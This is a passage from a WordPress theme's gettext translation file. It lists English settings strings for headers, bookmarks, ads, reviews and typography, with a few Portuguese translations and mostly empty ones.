search results." msgstr "" #: backend/panels/header.php:658 msgid "Only Homepage" msgstr "" #: backend/panels/single-post.php:1450 msgid "Only load posts which has same categories with the current post." msgstr "" #: backend/panels/bookmark.php:55 msgid "Only Logged Users" msgstr "" #: backend/panels/blog-pages.php:1900 msgid "Only Search Posts" msgstr "" #: backend/panels/header.php:659 msgid "Only show the bar in the homepage." msgstr "" #: backend/panels/header.php:90 msgid "Only stick the main menu when scrolling up." msgstr "" #: backend/configs.php:328 msgid "Only Text" msgstr "" #: backend/configs.php:329 msgid "Only Text (Big)" msgstr "" #: templates/blog.php:494 msgid "Oops! Nothing here" msgstr "Ops! Nada aqui" #: backend/panels/optimized.php:230 backend/panels/optimized.php:236 msgid "Open Graph" msgstr "" #: backend/panels/single-post.php:175 msgid "Optimal Line Length" msgstr "" #: backend/panels/single-post.php:172 msgid "" "Optimized the line length of the post content for reading (max width: 730px)." msgstr "" #: backend/single-metaboxes.php:45 msgid "" "Options below will apply to the single page and Elementor page. To config " "for the blog page, navigate to Theme Options > Blog & Achives." msgstr "" #: backend/mega-menu.php:242 msgid "or Attachment/SVG Icon" msgstr "" #: backend/mega-menu.php:197 msgid "or Ruby Templates Shortcode" msgstr "" #: backend/panels/optimized.php:175 msgid "Organization Info" msgstr "" #: backend/panels/optimized.php:121 msgid "Organization Schema Markup" msgstr "" #: backend/panels/single-post.php:586 msgid "" "Organize how you want the entry meta info to appear in the single post pages." msgstr "" #: backend/panels/block-classic.php:51 backend/panels/block-grid.php:51 #: backend/panels/block-grid.php:216 backend/panels/block-grid.php:381 #: backend/panels/block-grid.php:554 backend/panels/block-grid.php:741 #: backend/panels/block-list.php:59 backend/panels/block-list.php:232 #: backend/panels/block-list.php:413 backend/panels/block-list.php:608 #: backend/panels/blog-pages.php:385 backend/panels/blog-pages.php:872 #: backend/panels/blog-pages.php:1286 backend/panels/blog-pages.php:1694 #: backend/panels/blog-pages.php:2186 backend/panels/bookmark.php:284 #: backend/panels/bookmark.php:732 msgid "" "Organize how you want the entry meta to appear. Leave blank to set it as the " "default." msgstr "" #: backend/panels/design.php:394 msgid "Original Ratio - 1536x0" msgstr "" #: backend/panels/design.php:386 msgid "Original Ratio - 860x0" msgstr "" #: backend/panels/adblock.php:35 msgid "" "Our site is an advertising supported site. Please whitelist to support our " "site." msgstr "" #: templates/entry.php:1087 msgid "out of 10" msgstr "" #: templates/entry.php:1090 msgid "out of 5" msgstr "" #: backend/panels/header.php:232 msgid "Override default search icon with a SVG icon." msgstr "" #: backend/single-metaboxes.php:229 msgid "p" msgstr "" #: backend/configs.php:243 msgid "p tag" msgstr "" #: backend/panels/breadcrumb.php:45 msgid "Page Breadcrumbs" msgstr "" #: backend/single-metaboxes.php:56 msgid "Page Header Style" msgstr "" #: backend/panels/blog-pages.php:1029 msgid "Pagination" msgstr "" #: backend/panels/single-post.php:1367 msgid "Pagination Style" msgstr "" #: backend/category-settings.php:225 backend/panels/blog-pages.php:547 #: backend/panels/blog-pages.php:1035 backend/panels/blog-pages.php:1448 #: backend/panels/blog-pages.php:1856 backend/panels/blog-pages.php:2348 #: backend/panels/bookmark.php:569 msgid "Pagination Type" msgstr "" #: backend/panels/single-post.php:171 msgid "Paragraph Line Length" msgstr "" #: backend/configs.php:610 msgid "Pattern Diagonal" msgstr "" #: backend/configs.php:611 msgid "Pattern Diagonal 2" msgstr "" #: backend/configs.php:608 msgid "Pattern Dotted" msgstr "" #: backend/configs.php:609 msgid "Pattern Dotted 2" msgstr "" #: templates/single/review-comment.php:90 msgid "Perfect" msgstr "" #: backend/panels/optimized.php:14 msgid "Performance" msgstr "" #: backend/panels/optimized.php:188 msgid "Phone Number" msgstr "" #: backend/panels/single-post.php:741 backend/panels/single-post.php:880 #: backend/panels/single-post.php:1018 backend/panels/single-post.php:1649 #: templates/parts.php:600 msgid "Pinterest" msgstr "" #: backend/panels/socials.php:55 msgid "Pinterest URL" msgstr "" #: includes/fallbacks.php:273 #, php-format msgid "Please assign a menu to the \"%s\" location under " msgstr "" #: backend/panels/design.php:70 msgid "Please blank to display all categories" msgstr "" #: backend/class-tgm-plugin-activation.php:409 msgid "Please contact the administrator of this site for help." msgstr "" #: backend/class-tgm-plugin-activation.php:1027 #: backend/class-tgm-plugin-activation.php:1030 msgid "" "Please contact the plugin provider and ask them to package their plugin " "according to the WordPress guidelines." msgstr "" #: backend/mega-menu.php:240 backend/panels/socials.php:171 msgid "" "Please ensure that Font Awesome is enabled in \"Theme Options > Theme Design " "> Font Awesome\" if you use this font icon classname." msgstr "" #: backend/single-metaboxes.php:373 msgid "" "Please ensure that the \"Audio\" option is chosen under \"Post Format\" " "selection box when you use this panel." msgstr "" #: backend/single-metaboxes.php:420 msgid "" "Please ensure that the \"Gallery\" option is chosen under \"Post Format\" " "selection box when you use this panel." msgstr "" #: backend/single-metaboxes.php:318 msgid "" "Please ensure that the \"Video\" option is chosen under \"Post Format\" " "selection box when you use this panel." msgstr "" #: backend/panels/design.php:616 msgid "" "Please ensure that you are using trusted svg sources to avoid XML " "vulnerabilities." msgstr "" #: templates/single/review-comment.php:86 msgid "Please select a rating!" msgstr "" #: backend/panels/header.php:53 msgid "" "Please select setting panel corresponding to the layout you choose for " "setting up background, color and other settings." msgstr "" #: backend/panels/newsletter.php:21 msgid "" "Please update cover images to your own images after importing the theme demo." msgstr "" #: templates/entry.php:1345 msgid "Please update WordPress to the latest version to display this audio." msgstr "" #: templates/entry.php:1292 msgid "Please update WordPress to the latest version to display this video." msgstr "" #: backend/class-tgm-plugin-activation.php:2641 msgid "Plugin" msgstr "" #: backend/class-tgm-plugin-activation.php:399 #: backend/class-tgm-plugin-activation.php:3253 backend/install-plugins.php:81 msgid "Plugin activated successfully." msgstr "" #: backend/class-tgm-plugin-activation.php:3252 msgid "Plugin activation failed." msgstr "" #: backend/class-tgm-plugin-activation.php:404 #, php-format msgid "" "Plugin not activated. A higher version of %s is needed for this theme. " "Please update the plugin." msgstr "" #: backend/panels/single-post.php:362 msgid "Policy Text" msgstr "" #: backend/panels/single-post.php:1388 backend/panels/single-post.php:1394 msgid "Popular Section" msgstr "" #: backend/panels/newsletter.php:77 msgid "Popup Expired" msgstr "" #: backend/panels/newsletter.php:14 backend/panels/newsletter.php:27 msgid "Popup Newsletter" msgstr "" #: backend/panels/bookmark.php:44 msgid "Popup Notification" msgstr "" #: backend/panels/header.php:518 msgid "Popup Sign In" msgstr "" #: backend/configs.php:855 msgid "Portrait (300x1050)" msgstr "" #: templates/single/review-comment.php:51 msgid "Post a Review" msgstr "" #: backend/category-settings.php:365 backend/category-settings.php:381 #: backend/panels/block-classic.php:73 backend/panels/block-grid.php:73 #: backend/panels/block-grid.php:238 backend/panels/block-grid.php:403 #: backend/panels/block-grid.php:576 backend/panels/block-grid.php:763 #: backend/panels/block-list.php:81 backend/panels/block-list.php:254 #: backend/panels/block-list.php:435 backend/panels/block-list.php:630 #: backend/panels/blog-pages.php:408 backend/panels/blog-pages.php:895 #: backend/panels/blog-pages.php:1309 backend/panels/blog-pages.php:1717 #: backend/panels/blog-pages.php:2209 backend/panels/bookmark.php:307 #: backend/panels/bookmark.php:755 msgid "Post Format Icon" msgstr "" #: backend/panels/design.php:470 msgid "Post Format Icons" msgstr "" #: backend/single-metaboxes.php:205 msgid "Post highlights" msgstr "" #: backend/single-metaboxes.php:187 msgid "Post Options" msgstr "" #: backend/single-metaboxes.php:471 msgid "Post Review" msgstr "" #: backend/panels/optimized.php:160 msgid "Post Review Markup" msgstr "" #: backend/single-metaboxes.php:771 msgid "Post Sources" msgstr "" #: backend/panels/single-post.php:296 msgid "Post Tags Bar" msgstr "" #: backend/panels/table-contents.php:23 msgid "Post Type Supported" msgstr "" #: backend/single-metaboxes.php:792 msgid "Post Via" msgstr "" #: backend/panels/design.php:131 msgid "Post View Meta Icon" msgstr "" #: backend/install-plugins.php:48 msgid "Post Views Counter" msgstr "" #: backend/panels/optimized.php:216 msgid "Postal Code" msgstr "" #: templates/entry.php:367 templates/entry.php:401 msgid "Posted" msgstr "" #: templates/entry.php:1159 msgid "Posted by" msgstr "" #: backend/panels/single-post.php:1347 msgid "Posts from Where" msgstr "" #: backend/category-settings.php:164 backend/panels/blog-pages.php:708 msgid "Posts Per Page" msgstr "" #: backend/category-settings.php:169 backend/panels/blog-pages.php:172 #: backend/panels/blog-pages.php:177 backend/panels/blog-pages.php:713 #: backend/panels/blog-pages.php:1123 backend/panels/blog-pages.php:1128 #: backend/panels/blog-pages.php:1532 backend/panels/blog-pages.php:1537 #: backend/panels/blog-pages.php:2024 backend/panels/blog-pages.php:2029 #: backend/panels/bookmark.php:561 msgid "Posts per Page" msgstr "" #: backend/class-tgm-plugin-activation.php:2392 msgid "Pre-Packaged" msgstr "" #: backend/panels/design.php:257 msgid "Prefix" msgstr "" #: backend/panels/optimized.php:74 msgid "Preload Font Icon" msgstr "" #: backend/panels/optimized.php:67 msgid "Preload Google Fonts" msgstr "" #: backend/panels/design.php:641 msgid "Prevent WordPress convert gif to a static image when uploading." msgstr "" #: backend/single-metaboxes.php:338 msgid "Preview Video" msgstr "" #: templates/parts.php:348 msgid "Previous" msgstr "" #: templates/single/templates.php:1016 msgid "Previous Article" msgstr "" #: templates/single/templates.php:564 msgid "Previous Page" msgstr "" #: backend/panels/woocommerce.php:188 msgid "Price Color" msgstr "" #: backend/panels/woocommerce.php:253 msgid "Price Font" msgstr "" #: backend/single-metaboxes.php:592 msgid "Price Offer" msgstr "" #: backend/panels/single-post.php:487 backend/single-metaboxes.php:267 msgid "Primary Category" msgstr "" #: backend/panels/heading.php:49 backend/panels/heading.php:134 msgid "Primary Heading Color" msgstr "" #: backend/panels/single-post.php:822 backend/panels/single-post.php:961 #: backend/panels/single-post.php:1099 backend/panels/single-post.php:1713 msgid "Print" msgstr "" #: backend/panels/privacy.php:14 msgid "Privacy Bar" msgstr "" #: backend/panels/privacy.php:7 msgid "Privacy Notice" msgstr "" #: backend/panels/woocommerce.php:237 msgid "Product Title Font" msgstr "" #: backend/panels/woocommerce.php:71 msgid "Products per Page" msgstr "" #: backend/panels/design.php:110 msgid "Published Date Icon" msgstr "" #: backend/panels/single-post.php:269 backend/panels/single-post.php:275 msgid "Quick View Info" msgstr "" #: templates/single/review-comment.php:89 msgid "Rate…" msgstr "" #: backend/panels/reaction.php:31 msgid "Reaction Heading" msgstr "" #: backend/panels/reaction.php:37 msgid "Reaction Items" msgstr "" #: backend/panels/reaction.php:23 msgid "Reaction Section" msgstr "" #: backend/configs.php:409 backend/panels/design.php:275 msgid "read (Reading Time)" msgstr "" #: templates/template-helpers.php:238 templates/template-helpers.php:382 msgid "Read More" msgstr "Leia mais" #: backend/category-settings.php:425 backend/panels/block-classic.php:106 #: backend/panels/block-grid.php:106 backend/panels/block-grid.php:271 #: backend/panels/block-grid.php:436 backend/panels/block-grid.php:609 #: backend/panels/block-grid.php:796 backend/panels/block-list.php:114 #: backend/panels/block-list.php:287 backend/panels/block-list.php:468 #: backend/panels/block-list.php:663 backend/panels/blog-pages.php:453 #: backend/panels/blog-pages.php:940 backend/panels/blog-pages.php:1354 #: backend/panels/blog-pages.php:1762 backend/panels/blog-pages.php:2254 #: backend/panels/bookmark.php:352 backend/panels/bookmark.php:800 #: backend/panels/design.php:535 backend/panels/typography.php:530 msgid "Read More Button" msgstr "" #: backend/panels/typography.php:538 msgid "Read More Font" msgstr "" #: backend/panels/design.php:549 msgid "Read More Icon" msgstr "" #: backend/panels/design.php:543 msgid "Read More Label" msgstr "" #: backend/panels/single-post.php:1564 msgid "Reading Font Resizer" msgstr "" #: backend/panels/single-post.php:1736 backend/panels/single-post.php:1745 msgid "Reading Indicator" msgstr "" #: backend/panels/bookmark.php:88 backend/panels/bookmark.php:106 #: templates/header/templates.php:710 msgid "Reading List" msgstr "" #: backend/panels/bookmark.php:98 msgid "Reading List Header" msgstr "" #: backend/panels/design.php:160 msgid "Reading Speed" msgstr "" #: backend/panels/single-post.php:661 backend/panels/single-post.php:667 msgid "Reading Time" msgstr "" #: backend/panels/design.php:138 msgid "Reading Time Meta Icon" msgstr "" #: templates/single/templates.php:1485 msgid "Reading:" msgstr "Leitura:" #: templates/blog.php:497 msgid "Ready to publish your first post?" msgstr "" #: templates/blog.php:17 #, php-format msgid "" "Ready to publish your first post? Get started here." msgstr "" #: backend/class-tgm-plugin-activation.php:2370 backend/panels/bookmark.php:502 msgid "Recommended" msgstr "" #: backend/panels/bookmark.php:520 msgid "Recommended for You" msgstr "" #: backend/panels/bookmark.php:512 msgid "Recommended Heading" msgstr "" #: backend/panels/design.php:315 msgid "Recommended select the top position if you have people images." msgstr "" #: backend/panels/single-post.php:777 backend/panels/single-post.php:916 #: backend/panels/single-post.php:1054 backend/panels/single-post.php:1681 #: templates/parts.php:639 msgid "Reddit" msgstr "" #: backend/panels/socials.php:128 msgid "Reddit URL " msgstr "" #: backend/panels/header.php:527 backend/panels/login.php:95 msgid "Redirect links should be inner links." msgstr "" #: backend/panels/login.php:93 msgid "Redirect Settings" msgstr "" #: backend/panels/bookmark.php:56 msgid "Redirect to Login for Guest Users" msgstr "" #: backend/panels/login.php:104 msgid "Redirect to this link after logged in." msgstr "" #: backend/panels/header.php:619 backend/panels/login.php:112 msgid "Redirect to this link after successful logout." msgstr "" #: backend/panels/login.php:58 msgid "Redirect to this link when clicking on the logo." msgstr "" #: backend/panels/dark-mode.php:36 msgid "Reduce the featured image opacity when enabled the dark mode." msgstr "" #: backend/panels/sidebar.php:15 msgid "" "Refresh your browser after creating new sidebars to update your changes." msgstr "" #: templates/popup.php:206 msgid "Register" msgstr "" #: backend/panels/single-post.php:1249 msgid "Related & Popular" msgstr "" #: backend/panels/single-post.php:1304 msgid "Related Heading" msgstr "" #: backend/panels/amp.php:222 backend/panels/single-post.php:1290 #: backend/panels/single-post.php:1296 msgid "Related Section" msgstr "" #: backend/panels/single-post.php:1266 msgid "Related Shortcode" msgstr "" #: bookmark/template-helpers.php:30 templates/entry.php:286 msgid "Remove" msgstr "Remover" #: backend/panels/amp.php:69 msgid "Remove Footer Switcher" msgstr "" #: backend/panels/amp.php:70 msgid "Remove the \"Exit Mobile Version\" link at the footer." msgstr "" #: bookmark/bookmark.php:56 msgid "Removed from reading list" msgstr "" #: backend/configs.php:426 msgid "Replace for Entry Meta" msgstr "" #: backend/class-tgm-plugin-activation.php:2367 msgid "Required" msgstr "" #: backend/class-tgm-plugin-activation.php:2421 msgid "Required Update not Available" msgstr "" #: backend/class-tgm-plugin-activation.php:2424 msgid "Requires Update" msgstr "" #: templates/header/templates.php:758 msgid "Resizer" msgstr "Redimensionador" #: backend/category-settings.php:465 backend/panels/block-classic.php:129 #: backend/panels/block-grid.php:129 backend/panels/block-grid.php:294 #: backend/panels/block-grid.php:459 backend/panels/block-grid.php:632 #: backend/panels/block-grid.php:819 backend/panels/block-list.php:137 #: backend/panels/block-list.php:310 backend/panels/block-list.php:491 #: backend/panels/block-list.php:686 backend/panels/blog-pages.php:490 #: backend/panels/blog-pages.php:977 backend/panels/blog-pages.php:1391 #: backend/panels/blog-pages.php:1799 backend/panels/blog-pages.php:2291 #: backend/panels/bookmark.php:389 backend/panels/bookmark.php:837 msgid "Responsive - Hide Entry Category" msgstr "" #: backend/category-settings.php:495 backend/panels/block-classic.php:155 #: backend/panels/block-grid.php:155 backend/panels/block-grid.php:320 #: backend/panels/block-grid.php:485 backend/panels/block-grid.php:658 #: backend/panels/block-grid.php:845 backend/panels/block-list.php:163 #: backend/panels/block-list.php:336 backend/panels/block-list.php:517 #: backend/panels/block-list.php:712 backend/panels/blog-pages.php:520 #: backend/panels/blog-pages.php:1007 backend/panels/blog-pages.php:1421 #: backend/panels/blog-pages.php:1829 backend/panels/blog-pages.php:2321 #: backend/panels/bookmark.php:411 backend/panels/bookmark.php:867 msgid "Responsive - Hide Excerpt" msgstr "" #: backend/panels/general.php:48 msgid "Restore/Backup" msgstr "" #: backend/panels/general.php:55 msgid "Restore/Backup Theme Options" msgstr "" #: backend/panels/logo.php:62 msgid "Retina Main Logo" msgstr "" #: templates/blog.php:22 msgid "Return to Home" msgstr "" #: templates/blog.php:505 templates/page.php:145 msgid "Return to Homepage" msgstr "Voltar a página inicial" #: backend/class-tgm-plugin-activation.php:397 backend/install-plugins.php:80 msgid "Return to Required Plugins Installer" msgstr "" #: backend/class-tgm-plugin-activation.php:398 #: backend/class-tgm-plugin-activation.php:920 #: backend/class-tgm-plugin-activation.php:2627 #: backend/class-tgm-plugin-activation.php:3674 msgid "Return to the Dashboard" msgstr "" #: backend/single-metaboxes.php:466 msgid "Review" msgstr "" #: backend/panels/single-post.php:1156 msgid "Review & Rating" msgstr "" #: templates/single/review-comment.php:43 msgid "Review Closed!" msgstr "" #: backend/single-metaboxes.php:534 msgid "Review Image" msgstr "" #: backend/category-settings.php:373 backend/panels/block-classic.php:58 #: backend/panels/block-grid.php:58 backend/panels/block-grid.php:223 #: backend/panels/block-grid.php:388 backend/panels/block-grid.php:561 #: backend/panels/block-grid.php:748 backend/panels/block-list.php:66 #: backend/panels/block-list.php:239 backend/panels/block-list.php:420 #: backend/panels/block-list.php:615 backend/panels/blog-pages.php:392 #: backend/panels/blog-pages.php:879 backend/panels/blog-pages.php:1293 #: backend/panels/blog-pages.php:1701 backend/panels/blog-pages.php:2193 #: backend/panels/bookmark.php:291 backend/panels/bookmark.php:739 msgid "Review Meta" msgstr "" #: backend/panels/block-classic.php:66 backend/panels/block-grid.php:66 #: backend/panels/block-grid.php:231 backend/panels/block-grid.php:396 #: backend/panels/block-grid.php:569 backend/panels/block-grid.php:756 #: backend/panels/block-list.php:74 backend/panels/block-list.php:247 #: backend/panels/block-list.php:428 backend/panels/block-list.php:623 #: backend/panels/blog-pages.php:400 backend/panels/blog-pages.php:887 #: backend/panels/blog-pages.php:1301 backend/panels/blog-pages.php:1709 #: backend/panels/blog-pages.php:2201 backend/panels/bookmark.php:299 #: backend/panels/bookmark.php:747 msgid "Review Meta Description" msgstr "" #: backend/single-metaboxes.php:499 msgid "Review Overview" msgstr "" #: backend/single-metaboxes.php:870 msgid "Review Schema Markup" msgstr "" #: backend/panels/color.php:132 msgid "Review Star Color" msgstr "" #: backend/panels/woocommerce.php:204 msgid "Review Start Color" msgstr "" #: backend/single-metaboxes.php:496 msgid "Review Title" msgstr "" #: backend/single-metaboxes.php:503 msgid "Review Type" msgstr "" #: backend/configs.php:181 backend/configs.php:545 backend/configs.php:824 #: backend/panels/login.php:42 msgid "Right" msgstr "" #: backend/panels/design.php:665 backend/panels/design.php:672 msgid "Round Corner" msgstr "" #: templates/parts.php:651 msgid "Rss" msgstr "" #: backend/panels/socials.php:152 msgid "Rss URL " msgstr "" #: backend/panels/design.php:305 msgid "" "Run regenerate thumbnail if you add/remove crop sizes. Please read " "documentation for further information." msgstr "" #: backend/panels/reaction.php:43 msgid "Sad" msgstr "" #: backend/panels/woocommerce.php:220 msgid "Sale Icon Background" msgstr "" #: backend/panels/single-post.php:1352 backend/panels/single-post.php:1449 msgid "Same Categories" msgstr "" #: backend/panels/single-post.php:1351 msgid "Same Tags" msgstr "" #: backend/panels/single-post.php:1350 msgid "Same Tags & Categories" msgstr "" #: bookmark/template-helpers.php:29 msgid "Save it" msgstr "Salve isso" #: backend/single-metaboxes.php:509 msgid "Score (1 > 10)" msgstr "" #: backend/single-metaboxes.php:526 msgid "Score (1 > 10) or Rating (1 > 5)" msgstr "" #: backend/panels/ads.php:101 backend/panels/ads.php:290 msgid "Script" msgstr "" #: backend/panels/ads.php:130 backend/panels/ads.php:319 msgid "Script - Ad Size" msgstr "" #: backend/panels/ads.php:122 backend/panels/ads.php:311 msgid "Script - Ad/Adsense Code" msgstr "" #: backend/panels/ads.php:141 backend/panels/ads.php:330 msgid "Script - Size on Desktop" msgstr "" #: backend/panels/ads.php:157 backend/panels/ads.php:346 msgid "Script - Size on Mobile" msgstr "" #: backend/panels/ads.php:149 backend/panels/ads.php:338 msgid "Script - Size on Tablet" msgstr "" #: backend/panels/ads.php:116 backend/panels/ads.php:305 msgid "Script Settings" msgstr "" #: backend/panels/newsletter.php:96 msgid "Scroll Distance" msgstr "" #: backend/panels/blog-pages.php:1886 backend/panels/header.php:190 #: searchform.php:18 templates/header/templates.php:345 templates/parts.php:477 msgid "Search" msgstr "Buscar" #: templates/header/templates.php:349 templates/parts.php:485 msgid "search" msgstr "buscar" #: templates/parts.php:474 msgid "Search and hit enter..." msgstr "" #: backend/panels/blog-pages.php:1895 msgid "Search Filter" msgstr "" #: searchform.php:14 msgid "Search for:" msgstr "" #: backend/panels/blog-pages.php:2418 msgid "Search Form" msgstr "" #: backend/panels/blog-pages.php:1961 msgid "Search Header" msgstr "" #: backend/panels/header.php:187 msgid "Search Heading" msgstr "" #: backend/panels/general.php:36 searchform.php:9 templates/parts.php:480 msgid "Search Headlines, News..." msgstr "" #: templates/blog.php:232 #, php-format msgid "Search Results for: %s" msgstr "Resultados da busca por: %s" #: templates/single/templates.php:1587 msgid "Section" msgstr "" #: backend/panels/ads.php:221 msgid "Section Background" msgstr "" #: backend/panels/bookmark.php:111 backend/panels/bookmark.php:454 msgid "Section Description" msgstr "" #: backend/panels/bookmark.php:104 backend/panels/bookmark.php:447 #: backend/panels/bookmark.php:518 msgid "Section Heading" msgstr "" #: backend/mega-menu.php:204 backend/panels/header.php:141 msgid "Section Width" msgstr "" #: backend/panels/footer.php:82 msgid "" "Select \"Use Ruby Template\" under the \"Footer Widgets Layout\" setting if " "you use Ruby Template shortcode." msgstr "" #: backend/panels/header.php:43 msgid "" "Select \"Use Ruby Template\" under the \"Global Header Style\" setting if " "you use Ruby Template shortcode." msgstr "" #: backend/panels/heading.php:75 backend/panels/heading.php:160 msgid "Select a accent color for the heading in the dark mode." msgstr "" #: backend/panels/heading.php:58 backend/panels/heading.php:143 msgid "Select a accent color for the heading." msgstr "" #: backend/panels/header-style.php:219 backend/panels/header-style.php:508 #: backend/panels/header-style.php:774 msgid "Select a accent color when hovering in the dark mode." msgstr "" #: backend/panels/header-style.php:141 backend/panels/header-style.php:285 #: backend/panels/header-style.php:429 backend/panels/header-style.php:696 msgid "Select a accent color when hovering." msgstr "" #: backend/panels/ads.php:98 msgid "Select a ad type for displaying in the top of the website." msgstr "" #: backend/panels/ads.php:286 msgid "Select a ad type for displaying inside the single post content." msgstr "" #: backend/panels/ads.php:417 msgid "Select a align style for the adverts." msgstr "" #: backend/single-metaboxes.php:378 msgid "" "Select a audio layout for this post, It will override on the default " "settings in the Theme Options panel." msgstr "" #: backend/panels/woocommerce.php:229 msgid "Select a background color for the \"Add to Cart\" button." msgstr "" #: backend/panels/header.php:483 msgid "Select a background color for the collapse section in the dark mode." msgstr "" #: backend/panels/header.php:430 msgid "Select a background color for the collapse section." msgstr "" #: backend/panels/header.php:463 msgid "" "Select a background color for the mobile navigation bar and quick view " "mobile menu in the dark mode." msgstr "" #: backend/panels/header.php:409 msgid "" "Select a background color for the mobile navigation bar and quick view " "mobile menu." msgstr "" #: backend/panels/header-style.php:192 backend/panels/header-style.php:481 #: backend/panels/header-style.php:747 msgid "" "Select a background color for the navigation bar of this header in the dark " "mode." msgstr "" #: backend/panels/header-style.php:113 backend/panels/header-style.php:401 #: backend/panels/header-style.php:668 msgid "Select a background color for the navigation bar of this header." msgstr "" #: backend/panels/ads.php:537 msgid "" "Select a background color for the slide up toggle button when not activated." msgstr "" #: backend/panels/header-style.php:228 backend/panels/header-style.php:517 #: backend/panels/header-style.php:783 msgid "" "Select a background color for the sub menu and other dropdown sections of " "this header in the dark mode." msgstr "" #: backend/panels/header-style.php:150 backend/panels/header-style.php:438 #: backend/panels/header-style.php:705 msgid "" "Select a background color for the sub menu and other dropdown sections of " "this header." msgstr "" #: backend/panels/single-post.php:1762 msgid "Select a background color for this bar." msgstr "" #: backend/panels/woocommerce.php:221 msgid "Select a background color value for the sale icon." msgstr "" #: backend/panels/color.php:103 msgid "" "Select a background for the dark mode icon (Moon icon) of the dark mode " "switcher button to fit with the main navigation color." msgstr "" #: backend/panels/footer.php:41 msgid "Select a background for the footer in the dark mode: image, color, etc" msgstr "" #: backend/panels/footer.php:31 msgid "Select a background for the footer: image, color, etc" msgstr "" #: backend/panels/ads.php:230 msgid "Select a background for this ad section in the dark mode." msgstr "" #: backend/panels/ads.php:222 msgid "Select a background for this ad section." msgstr "" #: backend/panels/ads.php:507 msgid "Select a background for this section in the dark mode." msgstr "" #: backend/panels/ads.php:501 msgid "Select a background for this section." msgstr "" #: backend/panels/blog-pages.php:1493 msgid "Select a background style for the archive header." msgstr "" #: backend/panels/blog-pages.php:1085 msgid "Select a background style for the author header." msgstr "" #: backend/category-settings.php:93 backend/panels/blog-pages.php:91 msgid "Select a background style for this category header." msgstr "" #: backend/panels/bookmark.php:134 backend/panels/bookmark.php:484 msgid "Select a background style for this heading." msgstr "" #: backend/panels/block-grid.php:527 backend/panels/block-grid.php:714 #: backend/panels/block-list.php:378 backend/panels/block-list.php:573 msgid "Select a box style for the post listing." msgstr "" #: backend/panels/color.php:124 msgid "Select a color for post excerpt text." msgstr "" #: backend/panels/block-list.php:532 backend/panels/block-list.php:727 msgid "" "Select a color for the background or border style in the dark mode or light " "scheme mode." msgstr "" #: backend/panels/block-grid.php:680 backend/panels/block-grid.php:867 msgid "Select a color for the background or border style in the dark mode." msgstr "" #: backend/panels/block-grid.php:673 backend/panels/block-grid.php:860 #: backend/panels/block-list.php:525 backend/panels/block-list.php:720 msgid "Select a color for the background or border style." msgstr "" #: backend/panels/color.php:141 msgid "Select a color for the breadcrumb bar." msgstr "" #: backend/panels/single-post.php:254 msgid "Select a color for the hyperlink underline in the dark mode." msgstr "" #: backend/panels/single-post.php:246 msgid "" "Select a color for the hyperlink underline. Leave blank to set as the global " "color." msgstr "" #: backend/panels/color.php:95 msgid "" "Select a color for the light mode icon (Sun icon) of the dark mode switcher " "button to fit with the main navigation color." msgstr "" #: backend/panels/login.php:80 msgid "Select a color for the login screen." msgstr "" #: backend/panels/ads.php:521 msgid "" "Select a color for the slide up toggle button when activated in the dark " "mode." msgstr "" #: backend/panels/ads.php:513 msgid "Select a color for the slide up toggle button when activated." msgstr "" #: backend/panels/ads.php:529 msgid "Select a color for the slide up toggle button when not activated." msgstr "" #: backend/panels/privacy.php:65 msgid "Select a color for the text in the dark mode." msgstr "" #: backend/panels/privacy.php:49 msgid "Select a color for the text." msgstr "" #: backend/panels/privacy.php:57 msgid "Select a color for this box background in the dark mode." msgstr "" #: backend/panels/privacy.php:41 msgid "Select a color for this box background." msgstr "" #: backend/panels/socials.php:199 backend/panels/socials.php:226 #: backend/panels/socials.php:253 msgid "Select a color for this social icon." msgstr "" #: backend/panels/single-post.php:227 msgid "Select a color value for post hyperlinks in the dark mode." msgstr "" #: backend/panels/single-post.php:219 msgid "Select a color value for post hyperlinks." msgstr "" #: backend/panels/design.php:516 msgid "" "Select a color value for the audio icon. This setting will not apply to " "bottom right layout." msgstr "" #: backend/panels/design.php:508 msgid "" "Select a color value for the gallery icon. This setting will not apply to " "bottom right layout" msgstr "" #: backend/panels/single-post.php:235 msgid "Select a color value for the post hyperlinks." msgstr "" #: backend/panels/woocommerce.php:197 msgid "Select a color value for the product price in the dark mode." msgstr "" #: backend/panels/woocommerce.php:189 msgid "Select a color value for the product price." msgstr "" #: backend/panels/color.php:133 msgid "Select a color value for the star icons." msgstr "" #: backend/panels/woocommerce.php:213 msgid "Select a color value for the stars review in the dark mode." msgstr "" #: backend/panels/woocommerce.php:205 msgid "Select a color value for the stars review." msgstr "" #: backend/panels/design.php:499 msgid "" "Select a color value for the video icon. This setting will not apply to " "bottom right layout" msgstr "" #: backend/panels/newsletter.php:72 msgid "Select a cover image for the box." msgstr "" #: backend/single-metaboxes.php:244 msgid "" "Select a crop size for the featured image in case you would like to control " "the size." msgstr "" #: backend/category-settings.php:329 msgid "" "Select a crop size for the featured image to displaying in this category." msgstr "" #: backend/panels/woocommerce.php:254 msgid "Select a custom font for the product price." msgstr "" #: backend/panels/woocommerce.php:238 msgid "Select a custom font for the product title." msgstr "" #: backend/panels/ads.php:131 backend/panels/ads.php:320 msgid "Select a custom size for this ad if you use adsense ad units." msgstr "" #: backend/panels/color.php:58 msgid "" "Select a dark accent color for your website, This setting apply to single " "header background, gradient colors." msgstr "" #: backend/panels/color.php:87 msgid "" "Select a dark solid background for the dark mode. Leave blank to set it as " "the default." msgstr "" #: backend/panels/single-post.php:1188 msgid "Select a default featured image for the review box." msgstr "" #: backend/panels/heading.php:41 msgid "" "Select a default heading layout for the archives and Elementor blocks for " "your website." msgstr "" #: backend/panels/single-post.php:45 msgid "Select a default layout for the single post pages." msgstr "" #: backend/panels/single-post.php:1165 msgid "Select a default review type for your website." msgstr "" #: backend/panels/design.php:443 msgid "" "Select a effect for the sliders. This setting will be not available for the " "carousel mode." msgstr "" #: backend/panels/design.php:266 msgid "" "Select a fallback meta for displaying when if the post does not have custom " "meta value." msgstr "" #: backend/panels/block-classic.php:32 backend/panels/block-grid.php:32 #: backend/panels/block-grid.php:197 backend/panels/block-grid.php:362 #: backend/panels/block-grid.php:535 backend/panels/block-grid.php:722 #: backend/panels/block-list.php:32 backend/panels/block-list.php:205 #: backend/panels/block-list.php:386 backend/panels/block-list.php:581 #: backend/panels/blog-pages.php:350 backend/panels/blog-pages.php:837 #: backend/panels/blog-pages.php:1251 backend/panels/blog-pages.php:1659 #: backend/panels/blog-pages.php:2151 backend/panels/bookmark.php:250 #: backend/panels/bookmark.php:698 msgid "Select a featured image size to optimize with the columns setting." msgstr "" #: backend/panels/typography.php:654 backend/panels/typography.php:1129 msgid "" "Select a font size (px) for buttons on mobile devices (max screen width: " "767px), Leave this option blank to set the default value." 